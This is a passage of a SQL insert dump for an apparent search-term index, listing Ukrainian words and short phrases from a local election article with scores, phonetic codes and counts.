родини',0,1,1.5333,'н000',1,'*'),(1616929,'не на','не на',0,1,1.1667,'н000',1,'*'),(1616930,'не на погашення','не на погашення',0,1,1.5,'н000',1,'*'),(1616931,'не пов\'язані','не пов',0,1,1.4,'н000',1,'*'),(1616932,'не пов\'язані з','не пов з',0,1,1.4667,'н000',1,'*'),(1616933,'не самоціль','не самоціль',0,1,1.3667,'н000',1,'*'),(1616934,'не самоціль ми','не самоціль ми',0,1,1.4667,'н000',1,'*'),(1616935,'не сподобається','не сподобається',0,1,1.5,'н000',1,'*'),(1616936,'не сподобається знайдеться','не сподобається знайдеться',0,1,1.8667,'н000',1,'*'),(1616937,'не сформовані','не сформовані',0,1,1.4333,'н000',1,'*'),(1616938,'не сформовані коли','не сформовані коли',0,1,1.6,'н000',1,'*'),(1616939,'не тільки','не тільки',0,1,1.3,'н000',2,'*'),(1616940,'не тільки всієї','не тільки всієї',0,1,1.5,'н000',1,'*'),(1616941,'не тільки ті','не тільки ті',0,1,1.4,'н000',1,'*'),(1616942,'небайдужа','небайдужа',0,0,0.6,'н000',1,'*'),(1616943,'небайдужа доля','небайдужа доля',0,1,1.4667,'н000',1,'*'),(1616944,'небайдужа доля міста','небайдужа доля міста',0,1,1.6667,'н000',1,'*'),(1616945,'невигідному','невигідному',0,0,0.7333,'н000',1,'*'),(1616946,'невигідному становищі','невигідному становищі',0,1,1.7,'н000',1,'*'),(1616947,'невигідному становищі тому','невигідному становищі тому',0,1,1.8667,'н000',1,'*'),(1616948,'незахищеними','незахищеними',0,0,0.8,'н000',1,'*'),(1616949,'незахищеними тому','незахищеними тому',0,1,1.5667,'н000',1,'*'),(1616950,'незахищеними тому першим','незахищеними тому першим',0,1,1.8,'н000',1,'*'),(1616951,'немає','немає',0,0,0.3333,'н000',1,'*'),(1616952,'немає «товстих','немає «товстих',0,1,1.4667,'н000',1,'*'),(1616953,'немає «товстих гаманців»,','немає «товстих гаманців»,',0,1,1.8333,'н000',1,'*'),(1616954,'немає закону','немає закону',0,1,1.4,'н000',1,'*'),(1616955,'немає закону про','немає закону про',0,1,1.5333,'н000',1,'*'),(1616956,'нинішнє','нинішнє',0,0,0.4667,'н000',1,'*'),(1616957,'нинішнє керівництво','нинішнє керівництво',0,1,1.6333,'н000',1,'*'),(1616958,'нинішнє керівництво мені','нинішнє керівництво мені',0,1,1.8,'н000',1,'*'),(1616959,'нинішні','нинішні',0,0,0.4667,'н000',1,'*'),(1616960,'нинішні вибори','нинішні вибори',0,1,1.4667,'н000',1,'*'),(1616961,'нинішні вибори до','нинішні вибори до',0,1,1.5667,'н000',1,'*'),(1616962,'них','них',0,0,0.2,'н000',1,'*'),(1616963,'них є','них є',0,1,1.1667,'н000',1,'*'),(1616964,'них є сільський','них є сільський',0,1,1.5,'н000',1,'*'),(1616965,'них не','них не',0,1,1.2,'н000',1,'*'),(1616966,'них не тільки','них не тільки',0,1,1.4333,'н000',1,'*'),(1616967,'нових','нових',0,0,0.3333,'н000',1,'*'),(1616968,'нових і','нових і',0,1,1.2333,'н000',1,'*'),(1616969,'нових і розвиток','нових і розвиток',0,1,1.5333,'н000',1,'*'),(1616970,'нормально','нормально',0,0,0.6,'н000',1,'*'),(1616971,'нормально жити','нормально жити',0,1,1.4667,'н000',1,'*'),(1616972,'нормально жити й','нормально жити й',0,1,1.5333,'н000',1,'*'),(1616973,'обіцянках','обіцянках',0,0,0.6,'о000',1,'*'),(1616974,'обіцянках а','обіцянках а',0,1,1.3667,'о000',1,'*'),(1616975,'обіцянках а працювати','обіцянках а працювати',0,1,1.7,'о000',1,'*'),(1616976,'обіцянках ми','обіцянках ми',0,1,1.4,'о000',1,'*'),(1616977,'обіцянках ми маємо','обіцянках ми маємо',0,1,1.6,'о000',1,'*'),(1616978,'обирали місцевих','обирали місцевих',0,1,1.5333,'о000',1,'*'),(1616979,'обирали місцевих місцева','обирали місцевих місцева',0,1,1.8,'о000',1,'*'),(1616980,'обирати','обирати',0,0,0.4667,'о000',1,'*'),(1616981,'обирати старосту','обирати старосту',0,1,1.5333,'о000',1,'*'),(1616982,'обирати старосту села','обирати старосту села',0,1,1.7,'о000',1,'*'),(1616983,'обласної','обласної',0,0,0.5333,'о000',1,'*'),(1616984,'обласної і','обласної і',0,1,1.3333,'о000',1,'*'),(1616985,'обласної і міської','обласної і міської',0,1,1.6,'о000',1,'*'),(1616986,'обласну','обласну',0,0,0.4667,'о000',1,'*'),(1616987,'обласну дати','обласну дати',0,1,1.4,'о000',1,'*'),(1616988,'обласну дати молодим','обласну дати молодим',0,1,1.6667,'о000',1,'*'),(1616989,'обслуговування','обслуговування',0,0,0.9333,'о000',1,'*'),(1616990,'обслуговування покращення','обслуговування покращення',0,1,1.8333,'о000',1,'*'),(1616991,'обслуговування покращення благоустрою','обслуговування покращення благоустрою',0,1,2,'о000',1,'*'),(1616992,'огорожу','огорожу',0,0,0.4667,'о000',1,'*'),(1616993,'огорожу кладовищ','огорожу кладовищ',0,1,1.5333,'о000',1,'*'),(1616994,'огорожу кладовищ очистку','огорожу кладовищ очистку',0,1,1.8,'о000',1,'*'),(1616995,'один великий','один великий',0,1,1.4,'о000',1,'*'),(1616996,'один великий кошик','один великий кошик',0,1,1.6,'о000',1,'*'),(1616997,'однодумців','однодумців',0,0,0.6667,'о000',1,'*'),(1616998,'однодумців амбіційних','однодумців амбіційних',0,1,1.7,'о000',1,'*'),(1616999,'однодумців амбіційних людей','однодумців амбіційних людей',0,1,1.9,'о000',1,'*'),(1617000,'округи які','округи які',0,1,1.3333,'о000',1,'*'),(1617001,'округи які не','округи які не',0,1,1.4333,'о000',1,'*'),(1617002,'олігархами','олігархами',0,0,0.6667,'о000',1,'*'),(1617003,'олігархами тож','олігархами тож',0,1,1.4667,'о000',1,'*'),(1617004,'олігархами тож люди','олігархами тож люди',0,1,1.6333,'о000',1,'*'),(1617005,'органів місцевого','органів місцевого',0,1,1.5667,'о000',1,'*'),(1617006,'органів місцевого самоврядування','органів місцевого самоврядування',0,1,2,'о000',1,'*'),(1617007,'організації партії «європейська','організації партії «європейська',0,1,2,'о000',1,'*'),(1617008,'органах','органах',0,0,0.4667,'о000',1,'*'),(1617009,'органах місцевого','органах місцевого',0,1,1.5667,'о000',1,'*'),(1617010,'органах місцевого самоврядування','органах місцевого самоврядування',0,1,2,'о000',1,'*'),(1617011,'очистку','очистку',0,0,0.4667,'о000',1,'*'),(1617012,'очистку вулиць','очистку вулиць',0,1,1.4667,'о000',1,'*'),(1617013,'очистку вулиць ремонт','очистку вулиць ремонт',0,1,1.7,'о000',1,'*'),(1617014,'очистці','очистці',0,0,0.4667,'о000',1,'*'),(1617015,'очистці води','очистці води',0,1,1.4,'о000',1,'*'),(1617016,'очистці води на','очистці води на',0,1,1.5,'о000',1,'*'),(1617017,'піаритись','піаритись',0,0,0.6,'п000',1,'*'),(1617018,'піаритись на','піаритись на',0,1,1.4,'п000',1,'*'),(1617019,'піаритись на порожніх','піаритись на порожніх',0,1,1.7,'п000',1,'*'),(1617020,'під час голосування','під час голосування',0,1,1.6333,'п000',1,'*'),(1617021,'підготовлених','підготовлених',0,0,0.8667,'п000',1,'*'),(1617022,'підготовлених людей','підготовлених людей',0,1,1.6333,'п000',1,'*'),(1617023,'підготовлених людей впевнена','підготовлених людей впевнена',0,1,1.9333,'п000',1,'*'),(1617024,'піднімати','піднімати',0,0,0.6,'п000',1,'*'),(1617025,'піднімати руку','піднімати руку',0,1,1.4667,'п000',1,'*'),(1617026,'піднімати руку під','піднімати руку під',0,1,1.6,'п000',1,'*'),(1617027,'підприємств','підприємств',0,0,0.7333,'п000',1,'*'),(1617028,'підприємств тобто','підприємств тобто',0,1,1.5667,'п000',1,'*'),(1617029,'підприємств тобто все','підприємств тобто все',0,1,1.7,'п000',1,'*'),(1617030,'підрозділів','підрозділів',0,0,0.7333,'п000',1,'*'),(1617031,'підрозділів вчителі','підрозділів вчителі',0,1,1.6333,'п000',1,'*'),(1617032,'підрозділів вчителі лікарі','підрозділів вчителі лікарі',0,1,1.8667,'п000',1,'*'),(1617033,'піду','піду',0,0,0.2667,'п000',1,'*'),(1617034,'піду тож','піду тож',0,1,1.2667,'п000',1,'*'),(1617035,'піду тож мені','піду тож мені',0,1,1.4333,'п000',1,'*'),(1617036,'пакет','пакет',0,0,0.3333,'п000',2,'*'),(1617037,'пакет фінансування','пакет фінансування',0,1,1.6,'п000',1,'*'),(1617038,'пакет фінансування при','пакет фінансування при',0,1,1.7333,'п000',1,'*'),(1617039,'партії «європейська','партії «європейська',0,1,1.6333,'п000',1,'*'),(1617040,'партії «європейська солідарність»','партії «європейська солідарність»',0,1,2,'п000',1,'*'),(1617041,'партій','партій',0,0,0.4,'п000',1,'*'),(1617042,'партій для','партій для',0,1,1.3333,'п000',1,'*'),(1617043,'партій для керівників','партій для керівників',0,1,1.7,'п000',1,'*'),(1617044,'партіями','партіями',0,0,0.5333,'п000',1,'*'),(1617045,'партіями піаритись','партіями піаритись',0,1,1.6,'п000',1,'*'),(1617046,'партіями піаритись на','партіями піаритись на',0,1,1.7,'п000',1,'*'),(1617047,'педагогічного','педагогічного',0,0,0.8667,'п000',1,'*'),(1617048,'педагогічного весь','педагогічного весь',0,1,1.6,'п000',1,'*'),(1617049,'педагогічного весь інший','педагогічного весь інший',0,1,1.8,'п000',1,'*'),(1617050,'перевагу','перевагу',0,0,0.5333,'п000',1,'*'),(1617051,'перевагу депутатству','перевагу депутатству',0,1,1.6667,'п000',1,'*'),(1617052,'перевагу депутатству в','перевагу депутатству в',0,1,1.7333,'п000',1,'*'),(1617053,'перейматись','перейматись',0,0,0.7333,'п000',1,'*'),(1617054,'перейматись їхніми','перейматись їхніми',0,1,1.6,'п000',1,'*'),(1617055,'перейматись їхніми проблемами','перейматись їхніми проблемами',0,1,1.9667,'п000',1,'*'),(1617056,'перепадатиме','перепадатиме',0,0,0.8,'п000',1,'*'),(1617057,'перепадатиме щось','перепадатиме щось',0,1,1.5667,'п000',1,'*'),(1617058,'перепадатиме щось селу','перепадатиме щось селу',0,1,1.7333,'п000',1,'*'),(1617059,'перспективи','перспективи',0,0,0.7333,'п000',1,'*'),(1617060,'перспективи для','перспективи для',0,1,1.5,'п000',1,'*'),(1617061,'перспективи для міста','перспективи для міста',0,1,1.7,'п000',1,'*'),(1617062,'першим','першим',0,0,0.4,'п000',1,'*'),(1617063,'першим своїм','першим своїм',0,1,1.4,'п000',1,'*'),(1617064,'першим своїм завдання','першим своїм завдання',0,1,1.7,'п000',1,'*'),(1617065,'першу','першу',0,0,0.3333,'п000',1,'*'),(1617066,'першу чергу','першу чергу',0,1,1.3667,'п000',1,'*'),(1617067,'першу чергу хочу','першу чергу хочу',0,1,1.5333,'п000',1,'*'),(1617068,'питань','питань',0,0,0.4,'п000',1,'*'),(1617069,'питань ви','питань ви',0,1,1.3,'п000',1,'*'),(1617070,'питань ви балотуєтесь','питань ви балотуєтесь',0,1,1.7,'п000',1,'*'),(1617071,'по команді','по команді',0,1,1.3333,'п000',1,'*'),(1617072,'по команді в','по команді в',0,1,1.4,'п000',1,'*'),(1617073,'по очистці','по очистці',0,1,1.3333,'п000',1,'*'),(1617074,'по очистці води','по очистці води',0,1,1.5,'п000',1,'*'),(1617075,'побажаємо','побажаємо',0,0,0.6,'п000',1,'*'),(1617076,'побажаємо зробити','побажаємо зробити',0,1,1.5667,'п000',1,'*'),(1617077,'побажаємо зробити правильний','побажаємо зробити правильний',0,1,1.9333,'п000',1,'*'),(1617078,'пов\'язані','пов',0,0,0.6,'п000',1,'*'),(1617079,'пов\'язані з','пов з',0,1,1.3667,'п000',1,'*'),(1617080,'пов\'язані з крупним','пов з крупним',0,1,1.6333,'п000',1,'*'),(1617081,'повернутись','повернутись',0,0,0.7333,'п000',1,'*'),(1617082,'повернутись назад','повернутись назад',0,1,1.5667,'п000',1,'*'),(1617083,'повернутись назад до','повернутись назад до',0,1,1.6667,'п000',1,'*'),(1617084,'повинен','повинен',0,0,0.4667,'п000',1,'*'),(1617085,'повинен стати','повинен стати',0,1,1.4333,'п000',1,'*'),(1617086,'повинен стати зразковим','повинен стати зразковим',0,1,1.7667,'п000',1,'*'),(1617087,'погашення','погашення',0,0,0.6,'п000',1,'*'),(1617088,'погашення заборгованості','погашення заборгованості',0,1,1.8,'п000',1,'*'),(1617089,'погашення заборгованості по','погашення заборгованості по',0,1,1.9,'п000',1,'*'),(1617090,'позбавили','позбавили',0,0,0.6,'п000',1,'*'),(1617091,'позбавили права','позбавили права',0,1,1.5,'п000',1,'*'),(1617092,'позбавили права самим','позбавили права самим',0,1,1.7,'п000',1,'*'),(1617093,'позицію','позицію',0,0,0.4667,'п000',1,'*'),(1617094,'позицію він','позицію він',0,1,1.3667,'п000',1,'*'),(1617095,'позицію він займає','позицію він займає',0,1,1.6,'п000',1,'*'),(1617096,'покращення благоустрою','покращення благоустрою',0,1,1.7333,'п000',1,'*'),(1617097,'покращення благоустрою інколи','покращення благоустрою інколи',0,1,1.9667,'п000',1,'*'),(1617098,'політичними','політичними',0,0,0.7333,'п000',1,'*'),(1617099,'політичними партіями','політичними партіями',0,1,1.6667,'п000',1,'*'),(1617100,'політичними партіями піаритись','політичними партіями піаритись',0,1,2,'п000',1,'*'),(1617101,'політичних','політичних',0,0,0.6667,'п000',1,'*'),(1617102,'політичних партій','політичних партій',0,1,1.5667,'п000',1,'*'),(1617103,'політичних партій для','політичних партій для',0,1,1.7,'п000',1,'*'),(1617104,'помічниках','помічниках',0,0,0.6667,'п000',1,'*'),(1617105,'помічниках більше','помічниках більше',0,1,1.5667,'п000',1,'*'),(1617106,'помічниках більше десятка','помічниках більше десятка',0,1,1.8333,'п000',1,'*'),(1617107,'попередньому','попередньому',0,0,0.8,'п000',1,'*'),(1617108,'попередньому місці','попередньому місці',0,1,1.6,'п000',1,'*'),(1617109,'попередньому місці роботи','попередньому місці роботи',0,1,1.8333,'п000',1,'*'),(1617110,'порожніх','порожніх',0,0,0.5333,'п000',1,'*'),(1617111,'порожніх обіцянках','порожніх обіцянках',0,1,1.6,'п000',1,'*'),(1617112,'порожніх обіцянках а','порожніх обіцянках а',0,1,1.6667,'п000',1,'*'),(1617113,'порожніх обіцянках ми','порожніх обіцянках ми',0,1,1.7,'п000',1,'*'),(1617114,'посадах','посадах',0,0,0.4667,'п000',1,'*'),(1617115,'посадах кожен','посадах кожен',0,1,1.4333,'п000',1,'*'),(1617116,'посадах кожен день','посадах кожен день',0,1,1.6,'п000',1,'*'),(1617117,'посаду','посаду',0,0,0.4,'п000',1,'*'),(1617118,'посаду старости','посаду старости',0,1,1.5,'п000',1,'*'),(1617119,'посаду старости може','посаду старости може',0,1,1.6667,'п000',1,'*'),(1617120,'потенціал','потенціал',0,0,0.6,'п000',1,'*'),(1617121,'потенціал географічне','потенціал географічне',0,1,1.7,'п000',1,'*'),(1617122,'потенціал географічне розташування','потенціал географічне розташування',0,1,2,'п000',1,'*'),(1617123,'потрібно','потрібно',0,0,0.5333,'п000',2,'*'),(1617124,'потрібно залучати','потрібно залучати',0,1,1.5667,'п000',1,'*'),(1617125,'потрібно залучати інвестиції','потрібно залучати інвестиції',0,1,1.9333,'п000',1,'*'),(1617126,'потрапити','потрапити',0,0,0.6,'п000',1,'*'),(1617127,'потрапити стороння','потрапити стороння',0,1,1.6,'п000',1,'*'),(1617128,'потрапити стороння людина','потрапити стороння людина',0,1,1.8333,'п000',1,'*'),(1617129,'потрапляти','потрапляти',0,0,0.6667,'п000',1,'*'),(1617130,'потрапляти й','потрапляти й',0,1,1.4,'п000',1,'*'),(1617131,'потрапляти й на','потрапляти й на',0,1,1.5,'п000',1,'*'),(1617132,'потреби','потреби',0,0,0.4667,'п000',1,'*'),(1617133,'потреби відстоювати','потреби відстоювати',0,1,1.6333,'п000',1,'*'),(1617134,'потреби відстоювати його','потреби відстоювати його',0,1,1.8,'п000',1,'*'),(1617135,'потреби міста','потреби міста',0,1,1.4333,'п000',1,'*'),(1617136,'потреби міста при','потреби міста при',0,1,1.5667,'п000',1,'*'),(1617137,'потреби не','потреби не',0,1,1.3333,'п000',1,'*'),(1617138,'потреби не тільки','потреби не тільки',0,1,1.5667,'п000',1,'*'),(1617139,'почувались','почувались',0,0,0.6667,'п000',1,'*'),(1617140,'почувались захищеними','почувались захищеними',0,1,1.7,'п000',1,'*'),(1617141,'почувались захищеними ми','почувались захищеними ми',0,1,1.8,'п000',1,'*'),(1617142,'почувались захищеними»','почувались захищеними»',0,1,1.7333,'п000',1,'*'),(1617143,'почувались комфортно','почувались комфортно',0,1,1.6667,'п000',1,'*'),(1617144,'почувались комфортно у','почувались комфортно у',0,1,1.7333,'п000',1,'*'),(1617145,'права','права',0,0,0.3333,'п000',1,'*'),(1617146,'права самим','права самим',0,1,1.3667,'п000',1,'*'),(1617147,'права самим обирати','права самим обирати',0,1,1.6333,'п000',1,'*'),(1617148,'права села','права села',0,1,1.3333,'п000',1,'*'),(1617149,'права села ще','права села ще',0,1,1.4333,'п000',1,'*'),(1617150,'правильний','правильний',0,0,0.6667,'п000',1,'*'),(1617151,'правильний вибір','правильний вибір',0,1,1.5333,'п000',1,'*'),(1617152,'працівників від','працівників від',0,1,1.5,'п000',1,'*'),(1617153,'працівників від нашого','працівників від нашого',0,1,1.7333,'п000',1,'*'),(1617154,'працювала','працювала',0,0,0.6,'п000',1,'*'),(1617155,'працювала в','працювала в',0,1,1.3667,'п000',1,'*'),(1617156,'працювала в органах','працювала в органах',0,1,1.6333,'п000',1,'*'),(1617157,'працювати','працювати',0,0,0.6,'п000',1,'*'),(1617158,'працювати з','працювати з',0,1,1.3667,'п000',1,'*'),(1617159,'працювати з людьми','працювати з людьми',0,1,1.6,'п000',1,'*'),(1617160,'працювати так','працювати так',0,1,1.4333,'п000',1,'*'),(1617161,'працювати так щоб','працювати так щоб',0,1,1.5667,'п000',1,'*'),(1617162,'працюватимуть','працюватимуть',0,0,0.8667,'п000',1,'*'),(1617163,'працюватимуть на','працюватимуть на',0,1,1.5333,'п000',1,'*'),(1617164,'працюватимуть на совість','працюватимуть на совість',0,1,1.8,'п000',1,'*'),(1617165,'працюючи','працюючи',0,0,0.5333,'п000',1,'*'),(1617166,'працюючи і','працюючи і',0,1,1.3333,'п000',1,'*'),(1617167,'працюючи і головою','працюючи і головою',0,1,1.6,'п000',1,'*'),(1617168,'представляємо','представляємо',0,0,0.8667,'п000',1,'*'),(1617169,'представляємо вам','представляємо вам',0,1,1.5667,'п000',1,'*'),(1617170,'представляємо вам кандидата','представляємо вам кандидата',0,1,1.9,'п000',1,'*'),(1617171,'прекрасна','прекрасна',0,0,0.6,'п000',1,'*'),(1617172,'прекрасна транспортна','прекрасна транспортна',0,1,1.7,'п000',1,'*'),(1617173,'прекрасна транспортна розв\'язка','прекрасна транспортна розв',0,1,2,'п000',1,'*'),(1617174,'при виборі','при виборі',0,1,1.3333,'п000',1,'*'),(1617175,'при виборі люди','при виборі люди',0,1,1.5,'п000',1,'*'),(1617176,'при ліквідації','при ліквідації',0,1,1.4667,'п000',1,'*'),(1617177,'при ліквідації сільських','при ліквідації сільських',0,1,1.8,'п000',1,'*'),(1617178,'при якому','при якому',0,1,1.3,'п000',1,'*'),(1617179,'при якому село','при якому село',0,1,1.4667,'п000',1,'*'),(1617180,'призначати','призначати',0,0,0.6667,'п000',1,'*'),(1617181,'призначати а','призначати а',0,1,1.4,'п000',1,'*'),(1617182,'призначати а це','призначати а це',0,1,1.5,'п000',1,'*'),(1617183,'прийшли','прийшли',0,0,0.4667,'п000',1,'*'),(1617184,'прийшли в','прийшли в',0,1,1.3,'п000',1,'*'),(1617185,'прийшли в нашу','прийшли в нашу',0,1,1.4667,'п000',1,'*'),(1617186,'приміром','приміром',0,0,0.5333,'п000',1,'*'),(1617187,'приміром на','приміром на',0,1,1.3667,'п000',1,'*'),(1617188,'приміром на огорожу','приміром на огорожу',0,1,1.6333,'п000',1,'*'),(1617189,'примножити','примножити',0,0,0.6667,'п000',1,'*'),(1617190,'примножити щоб','примножити щоб',0,1,1.4667,'п000',1,'*'),(1617191,'примножити щоб у','примножити щоб у',0,1,1.5333,'п000',1,'*'),(1617192,'принесли','принесли',0,0,0.5333,'п000',1,'*'),(1617193,'принесли користь','принесли користь',0,1,1.5333,'п000',1,'*'),(1617194,'принесли користь людям','принесли користь людям',0,1,1.7333,'п000',1,'*'),(1617195,'причин','причин',0,0,0.4,'п000',2,'*'),(1617196,'причин його','причин його',0,1,1.3667,'п000',1,'*'),(1617197,'причин його замінити','причин його замінити',0,1,1.6667,'п000',1,'*'),(1617198,'про кандидата','про кандидата',0,1,1.4333,'п000',1,'*'),(1617199,'про кандидата у','про кандидата у',0,1,1.5,'п000',1,'*'),(1617200,'про потреби','про потреби',0,1,1.3667,'п000',1,'*'),(1617201,'про потреби не','про потреби не',0,1,1.4667,'п000',1,'*'),(1617202,'про старостинські','про старостинські',0,1,1.5667,'п000',1,'*'),(1617203,'про старостинські округи','про старостинські округи',0,1,1.8,'п000',1,'*'),(1617204,'проблем','проблем',0,0,0.4667,'п000',1,'*'),(1617205,'проблемами','проблемами',0,0,0.6667,'п000',1,'*'),(1617206,'проблемами і','проблемами і',0,1,1.4,'п000',1,'*'),(1617207,'проблемами і щоразу','проблемами і щоразу',0,1,1.6333,'п000',1,'*'),(1617208,'проблеми','проблеми',0,0,0.5333,'п000',1,'*'),(1617209,'проблеми можна','проблеми можна',0,1,1.4667,'п000',1,'*'),(1617210,'проблеми можна було','проблеми можна було',0,1,1.6333,'п000',1,'*'),(1617211,'проблеми села','проблеми села',0,1,1.4333,'п000',1,'*'),(1617212,'проблеми села але','проблеми села але',0,1,1.5667,'п000',1,'*'),(1617213,'проблеми села зможу','проблеми села зможу',0,1,1.6333,'п000',1,'*'),(1617214,'програли','програли',0,0,0.5333,'п000',1,'*'),(1617215,'програли щоб','програли щоб',0,1,1.4,'п000',1,'*'),(1617216,'програли щоб вони','програли щоб вони',0,1,1.5667,'п000',1,'*'),(1617217,'пройдуть','пройдуть',0,0,0.5333,'п000',1,'*'),(1617218,'пройдуть то','пройдуть то',0,1,1.3667,'п000',1,'*'),(1617219,'пройдуть то не','пройдуть то не',0,1,1.4667,'п000',1,'*'),(1617220,'пройти','пройти',0,0,0.4,'п000',1,'*'),(1617221,'пройти у','пройти у',0,1,1.2667,'п000',1,'*'),(1617222,'пройти у міську','пройти у міську',0,1,1.5,'п000',1,'*'),(1617223,'просто','просто',0,0,0.4,'п000',4,'*'),(1617224,'просто займати','просто займати',0,1,1.4667,'п000',1,'*'),(1617225,'просто займати депутатське','просто займати депутатське',0,1,1.8667,'п000',1,'*'),(1617226,'просто піднімати','просто піднімати',0,1,1.5333,'п000',1,'*'),(1617227,'просто піднімати руку','просто піднімати руку',0,1,1.7,'п000',1,'*'),(1617228,'проявляти','проявляти',0,0,0.6,'п000',1,'*'),(1617229,'проявляти власну','проявляти власну',0,1,1.5333,'п000',1,'*'),(1617230,'проявляти власну ініціативу','проявляти власну ініціативу',0,1,1.9,'п000',1,'*'),(1617231,'різних посадах','різних посадах',0,1,1.4667,'р000',1,'*'),(1617232,'різних посадах кожен','різних посадах кожен',0,1,1.6667,'р000',1,'*'),(1617233,'рад','рад',0,0,0.2,'р000',1,'*'),(1617234,'рад мали','рад мали',0,1,1.2667,'р000',1,'*'),(1617235,'рад мали свої','рад мали свої',0,1,1.4333,'р000',1,'*'),(1617236,'рад село','рад село',0,1,1.2667,'р000',1,'*'),(1617237,'рад село залишається','рад село залишається',0,1,1.6667,'р000',1,'*'),(1617238,'раді знаю','раді знаю',0,1,1.3,'р000',1,'*'),(1617239,'раді знаю і','раді знаю і',0,1,1.3667,'р000',1,'*'),(1617240,'раді на','раді на',0,1,1.2333,'р000',1,'*'),(1617241,'раді на різних','раді на різних',0,1,1.4667,'р000',1,'*'),(1617242,'раді у','раді у',0,1,1.2,'р000',1,'*'),(1617243,'раді у першу','раді у першу',0,1,1.4,'р000',1,'*'),(1617244,'ради і в','ради і в',0,1,1.2667,'р000',1,'*'),(1617245,'ради більше','ради більше',0,1,1.3667,'р000',1,'*'),(1617246,'ради більше хочу','ради більше хочу',0,1,1.5333,'р000',1,'*'),(1617247,'ради голову','ради голову',0,1,1.3667,'р000',1,'*'),(1617248,'ради голову малинської','ради голову малинської',0,1,1.7333,'р000',1,'*'),(1617249,'ради затим','ради затим',0,1,1.3333,'р000',1,'*'),(1617250,'ради затим в','ради затим в',0,1,1.4,'р000',1,'*'),(1617251,'ради якщо','ради якщо',0,1,1.3,'р000',1,'*'),(1617252,'ради якщо староста','ради якщо староста',0,1,1.6,'р000',1,'*'),(1617253,'раду а','раду а',0,1,1.2,'р000',1,'*'),(1617254,'раду а дорогу','раду а дорогу',0,1,1.4333,'р000',1,'*'),(1617255,'разі виникнення','разі виникнення',0,1,1.5,'р000',1,'*'),(1617256,'разі виникнення якоїсь','разі виникнення якоїсь',0,1,1.7333,'р000',1,'*'),(1617257,'разі потреби','разі потреби',0,1,1.4,'р000',1,'*'),(1617258,'разі потреби відстоювати','разі потреби відстоювати',0,1,1.8,'р000',1,'*'),(1617259,'районній','районній',0,0,0.5333,'р000',1,'*'),(1617260,'районній раді','районній раді',0,1,1.4333,'р000',1,'*'),(1617261,'районній раді знаю','районній раді знаю',0,1,1.6,'р000',1,'*'),(1617262,'районній раді на','районній раді на',0,1,1.5333,'р000',1,'*'),(1617263,'рангів','рангів',0,0,0.4,'р000',1,'*'),(1617264,'рангів для','рангів для',0,1,1.3333,'р000',1,'*'),(1617265,'рангів для депутатів','рангів для депутатів',0,1,1.6667,'р000',1,'*'),(1617266,'рахунку','рахунку',0,0,0.4667,'р000',1,'*'),(1617267,'рахунку малинської','рахунку малинської',0,1,1.6,'р000',1,'*'),(1617268,'рахунку малинської громади','рахунку малинської громади',0,1,1.8667,'р000',1,'*'),(1617269,'реалізував','реалізував',0,0,0.6667,'р000',1,'*'),(1617270,'реалізував себе','реалізував себе',0,1,1.5,'р000',1,'*'),(1617271,'реалізував себе на','реалізував себе на',0,1,1.6,'р000',1,'*'),(1617272,'рейтингами','рейтингами',0,0,0.6667,'р000',1,'*'),(1617273,'рейтингами з','рейтингами з',0,1,1.4,'р000',1,'*'),(1617274,'рейтингами з іншими','рейтингами з іншими',0,1,1.6333,'р000',1,'*'),(1617275,'ремонт','ремонт',0,0,0.4,'р000',1,'*'),(1617276,'ремонт комунальних','ремонт комунальних',0,1,1.6,'р000',1,'*'),(1617277,'ремонт комунальних доріг','ремонт комунальних доріг',0,1,1.8,'р000',1,'*'),(1617278,'ресурси','ресурси',0,0,0.4667,'р000',1,'*'),(1617279,'ресурси які','ресурси які',0,1,1.3667,'р000',1,'*'),(1617280,'ресурси які витрачались','ресурси які витрачались',0,1,1.7667,'р000',1,'*'),(1617281,'реформи','реформи',0,0,0.4667,'р000',1,'*'),(1617282,'реформи кожна','реформи кожна',0,1,1.4333,'р000',1,'*'),(1617283,'реформи кожна людина','реформи кожна людина',0,1,1.6667,'р000',1,'*'),(1617284,'робітники','робітники',0,0,0.6,'р000',1,'*'),(1617285,'робітники воїни','робітники воїни',0,1,1.5,'р000',1,'*'),(1617286,'робітники воїни ато','робітники воїни ато',0,1,1.6333,'р000',1,'*'),(1617287,'робити','робити',0,0,0.4,'р000',2,'*'),(1617288,'робити для','робити для',0,1,1.3333,'р000',1,'*'),(1617289,'робити для створення','робити для створення',0,1,1.6667,'р000',1,'*'),(1617290,'роботи','роботи',0,0,0.4,'р000',2,'*'),(1617291,'роботи які','роботи які',0,1,1.3333,'р000',1,'*'),(1617292,'роботи які його','роботи які його',0,1,1.5,'р000',1,'*'),(1617293,'робочих','робочих',0,0,0.4667,'р000',1,'*'),(1617294,'робочих місць','робочих місць',0,1,1.4333,'р000',1,'*'),(1617295,'робочих місць розвитку','робочих місць розвитку',0,1,1.7333,'р000',1,'*'),(1617296,'родини','родини',0,0,0.4,'р000',1,'*'),(1617297,'родини кожної','родини кожної',0,1,1.4333,'р000',1,'*'),(1617298,'родини кожної людини','родини кожної людини',0,1,1.6667,'р000',1,'*'),(1617299,'розв\'язка','розв',0,0,0.6,'р000',1,'*'),(1617300,'розв\'язка потрібно','розв потрібно',0,1,1.6,'р000',1,'*'),(1617301,'розв\'язка потрібно залучати','розв потрібно залучати',0,1,1.9,'р000',1,'*'),(1617302,'розвиватись','розвиватись',0,0,0.7333,'р000',1,'*'),(1617303,'розвиватись багато','розвиватись багато',0,1,1.6,'р000',1,'*'),(1617304,'розвиватись багато років','розвиватись багато років',0,1,1.8,'р000',1,'*'),(1617305,'розвитку інфраструктури','розвитку інфраструктури',0,1,1.7667,'р000',1,'*'),(1617306,'розвитку інфраструктури міста','розвитку інфраструктури міста',0,1,1.9667,'р000',1,'*'),(1617307,'розвиток','розвиток',0,0,0.5333,'р000',1,'*'),(1617308,'розвиток сіл','розвиток сіл',0,1,1.4,'р000',1,'*'),(1617309,'розвиток сіл а','розвиток сіл а',0,1,1.4667,'р000',1,'*'),(1617310,'розвиток старих','розвиток старих',0,1,1.5,'р000',1,'*'),(1617311,'розвиток старих підприємств','розвиток старих підприємств',0,1,1.9,'р000',1,'*'),(1617312,'розташування','розташування',0,0,0.8,'р000',1,'*'),(1617313,'розташування прекрасна','розташування прекрасна',0,1,1.7333,'р000',1,'*'),(1617314,'розташування прекрасна транспортна','розташування прекрасна транспортна',0,1,2,'р000',1,'*'),(1617315,'розумію','розумію',0,0,0.4667,'р000',1,'*'),(1617316,'розумію тепер','розумію тепер',0,1,1.4333,'р000',1,'*'),(1617317,'розумію тепер будуть','розумію тепер будуть',0,1,1.6667,'р000',1,'*'),(1617318,'років головою','років головою',0,1,1.4333,'р000',1,'*'),(1617319,'років головою 